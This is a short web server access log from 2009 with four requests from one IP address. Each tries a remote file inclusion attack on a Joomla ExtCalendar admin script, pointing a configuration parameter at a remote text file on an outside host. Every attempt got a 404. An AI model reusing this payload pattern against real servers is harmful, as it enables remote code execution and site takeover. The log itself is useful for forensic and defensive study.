80.67.26.40 - - [07/Sep/2009:09:21:05 -0700] "GET /logs/access_080227.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.67.26.40 - - [07/Sep/2009:09:21:11 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.67.26.40 - - [07/Sep/2009:09:21:11 -0700] "GET /logs/access_090508.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.67.26.40 - - [07/Sep/2009:09:21:11 -0700] "GET /logs/access_081126.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
